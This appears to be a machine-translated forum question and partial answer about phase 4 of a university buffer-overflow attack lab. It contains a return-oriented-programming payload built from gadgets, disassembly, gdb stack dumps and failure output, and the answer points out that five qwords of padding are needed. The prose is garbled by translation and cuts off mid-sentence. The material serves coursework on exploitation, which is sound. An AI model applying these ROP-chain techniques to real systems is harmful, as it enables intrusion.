0000000000401f91 <addval_168>:
401f91: f3 0f 1e fa endbr64
401f95: 8d 87 0d 92 58 90 lea -0x6fa76df3(%rdi),%eax
401f9b: c3 retq
i使用0x401f99用作“ 58”的地址
popq %rax;
0000000000401fbd <addval_217>:
401fbd: f3 0f 1e fa endbr64
401fc1: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax
401fc7: c3 retq
,我使用地址0x401FC3用于“ 48 89 C7 C3”,该地址是:
movq %rax, %rdi;
ret;
,我已经设置了这样的有效载荷:
00 00 00 00 00 00 00 00 # Padding (buffer overflow)
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
99 1f 40 00 00 00 00 00 # (First gadget: popq %rax)
10 76 a6 11 00 00 00 00 # (Cookie - gets popped into %rax)
c3 1f 40 00 00 00 00 00 # (Second gadget: movq %rax, %rdi)
9d 1d 40 00 00 00 00 00 # (Final gadget: touch2)
完全匹配答案的每个版本的格式,包括我的同学的最终答案。我仔细检查了cookie和touch2地址的格式,这个同学确保我对这种格式没有什么不同于他的正确条目。但是,我得到了这个结果:
ylx739:tesla22 ~/attack/target72> ./rtarget < phase4-raw.txt
./rtarget: /lib64/libcurl.so.4: no version information available (required by ./rtarget)
Cookie: 0x11a67610
Type string:Misfire: You called touch2(0x00000001)
FAILED
I在GET后立即将堆栈中的堆栈看,在相应的功能中调用以获取我的输入的缓冲区,并找到:
(gdb) x/20xg $rsp
0x7ffffff91620: 0x0000000000000000 0x0000000000000000
0x7ffffff91630: 0x0000000000401f99 0x0000000011a67610
0x7ffffff91640: 0x0000000000401fc3 0x0000000000401d9d
0x7ffffff91650: 0x0000000000403100 0x0000000000402752
0x7ffffff91660: 0xf4f4f4f4f4f4f4f4 0xf4f4f4f4f4f4f4f4
其中包含我所有的所有人都输入了代码,但是一旦我输入touch2(),我试图溢出的功能,我就会发现:
(gdb) print/x $rdi
$1 = 0x7ffff7b389c0
是一些随机地址。我完全不确定为什么我的cookie不会被转移到RDI中。任何帮助将不胜感激。*编辑:touch2,溢出的目标:
0000000000401d9d <touch2>:
401d9d: f3 0f 1e fa endbr64
401da1: 50 push %rax
401da2: 58 pop %rax
401da3: 48 83 ec 08 sub $0x8,%rsp
401da7: 89 fa mov %edi,%edx
401da9: c7 05 49 37 00 00 02 movl $0x2,0x3749(%rip) # 4054fc <vlevel>
401db0: 00 00 00
401db3: 39 3d 4b 37 00 00 cmp %edi,0x374b(%rip) # 405504 <cookie>
401db9: 74 2a je 401de5 <touch2+0x48>
401dbb: 48 8d 35 e6 14 00 00 lea 0x14e6(%rip),%rsi # 4032a8 <_IO_stdin_used+0x2a8>
GetBuf():溢出的功能:
(gdb) disas getbuf
Dump of assembler code for function getbuf:
0x0000000000401d4f <+0>: endbr64
0x0000000000401d53 <+4>: sub $0x28,%rsp
0x0000000000401d57 <+8>: mov %rsp,%rdi
0x0000000000401d5a <+11>: callq 0x4021e7 <Gets>
0x0000000000401d5f <+16>: mov $0x1,%eax
0x0000000000401d64 <+21>: add $0x28,%rsp
0x0000000000401d68 <+25>: retq
End of assembler dump.
包含脆弱呼叫的功能是使用5个QWOWS的堆栈帧,如该QWOWS所证明的那样。因此,您的有效载荷需要5个QWORD填充而不是3个。对于您当前的版本,前两个QWOWS被
getbuf
getssub $0x28,%rsp
add $0x28,%rsp